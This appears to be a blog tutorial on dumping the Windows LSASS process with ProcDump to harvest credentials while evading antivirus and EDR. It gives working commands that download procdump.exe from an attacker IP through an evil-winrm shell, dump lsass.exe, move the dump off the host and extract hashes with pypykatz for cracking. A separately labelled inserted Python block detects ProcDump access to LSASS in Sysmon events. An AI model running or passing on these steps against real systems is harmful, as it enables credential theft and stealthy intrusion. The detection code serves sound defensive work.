How to dump LSASS with ProcDump
This article is for educational purposes only! I do not encourage you to run this against a machine you do not have permission to test. Performing these actions without permission can lead to prosecution by the courts. I am not responsible for your actions!
In this short article, I will guide you through the steps you can perform to dump the LSASS process on a machine running Microsoft Windows. Without further ado, let's jump into it.
Overview
If you are working on a CTF or are assigned to perform a pentest on a machine, you may end up in a situation where you have to dump the LSASS process. You can use the well-known tool Mimikatz for this purpose. Mimikatz has one big problem: it is recognized by 57 / 70 antivirus products on VirusTotal, so using Mimikatz is not a wise choice for most environments. There is a high chance that the antivirus will notice you, which reveals to the blue team that you are in the network.
To avoid detection, you can use a LOLBAS (Living Off the Land Binaries and Scripts) approach by using ProcDump instead of Mimikatz. ProcDump is recognized by 1 / 68 antivirus products on VirusTotal.
Even when you are using ProcDump you have to watch out. Some companies have deployed an EDR (Endpoint Detection and Response) solution on their systems. Most EDR solutions will generate a Medium alert when ProcDump is being used to dump a process, especially when the LSASS process is involved.
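The EDR alerting described above can be approximated from the defender's side over Sysmon-style process events. This is an added example, not code from the original article: the field names follow Sysmon Event ID 1 (process creation) and Event ID 10 (process access), while the OriginalFileName value `procdump`, the host names and the sample events are assumptions constructed for illustration.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# ProcDump dump-type switches (-ma, -mm, -mp), accepted with '-' or '/'.
DUMP_FLAG = re.compile(r"(?:^|\s)[-/]m[amp](?=\s|$)", re.IGNORECASE)
LSASS = re.compile(r"\blsass(?:\.exe)?\b", re.IGNORECASE)

def is_procdump(event):
    """True if the image name or the PE OriginalFileName says ProcDump."""
    names = (basename(event.get("Image", "")), event.get("OriginalFileName", ""))
    return any("procdump" in n.lower() for n in names)

def classify(event):
    """Return a finding label for one Sysmon-style event, or None."""
    if event.get("EventID") == 1 and is_procdump(event):  # process creation
        cmd = event.get("CommandLine", "")
        if DUMP_FLAG.search(cmd) and LSASS.search(cmd):
            return "procdump-lsass-cmdline"
    if event.get("EventID") == 10:  # process access
        source = basename(event.get("SourceImage", "")).lower()
        target = basename(event.get("TargetImage", "")).lower()
        if "procdump" in source and target == "lsass.exe":
            return "procdump-lsass-access"
    return None

def scan(events):
    """Return (host, finding) pairs for every event that matches a rule."""
    hits = []
    for event in events:
        finding = classify(event)
        if finding:
            hits.append((event.get("Computer", "?"), finding))
    return hits

# Constructed sample events (not real telemetry); WS01/WEB01 are made-up hosts.
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "WS01", "Image": r"C:\temp\procdump.exe",
     "OriginalFileName": "procdump",
     "CommandLine": r".\procdump.exe -accepteula -ma lsass.exe lsass.dmp"},
    {"EventID": 10, "Computer": "WS01", "SourceImage": r"C:\temp\procdump.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe"},
    {"EventID": 1, "Computer": "WEB01", "Image": r"C:\tools\procdump.exe",
     "OriginalFileName": "procdump",
     "CommandLine": r"procdump.exe -accepteula -ma w3wp.exe w3wp.dmp"},
    {"EventID": 1, "Computer": "WS01", "Image": r"C:\Windows\System32\findstr.exe",
     "OriginalFileName": "FINDSTR.EXE", "CommandLine": "findstr lsass notes.txt"},
]

if __name__ == "__main__":
    for host, finding in scan(SAMPLE_EVENTS):
        print(host, finding)
```

The third sample event is ordinary ProcDump troubleshooting of a web worker process and is deliberately not flagged, which keeps the rule usable on hosts where administrators run ProcDump legitimately.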
ProcDump
ProcDump is part of Windows Sysinternals. The main purpose of this command-line utility is to monitor for CPU spikes and generate crash dumps during a spike, so that an administrator or developer can determine the cause. It can also generate a dump of a process on demand, and that last capability is the one that is useful in our scenario.
Dumping LSASS
In this example, I have broken into a system and I want to dump LSASS. I already have a shell on the machine through Windows Remote Management (WinRM) with evil-winrm.
On the victim machine, we have downloaded procdump.exe to the C:\temp directory. I have hosted an HTTP server on my attacker machine to download the binary.
curl 10.10.14.13/procdump.exe -o procdump.exe
Now we can dump the lsass.exe process.
.\procdump.exe -accepteula -ma lsass.exe lsass.dmp
OK, we now have the lsass.dmp file, which contains juicy information. We need to transfer this file to our attacker machine to analyze the contents.
download lsass.dmp
Extracting lsass.dmp
To analyze the contents we use Pypykatz, a Python implementation of Mimikatz. If you do not have pypykatz installed, you can install it by running the command below.
git clone https://github.com/skelsec/pypykatz.git
Now run Pypykatz against the lsass.dmp file.
pypykatz lsa minidump lsass.dmp
You have now extracted the lsass.dmp file, which can contain plain text passwords. You can try to crack the LM hash and NT hash with hashcat.
Happy hacking! 🙂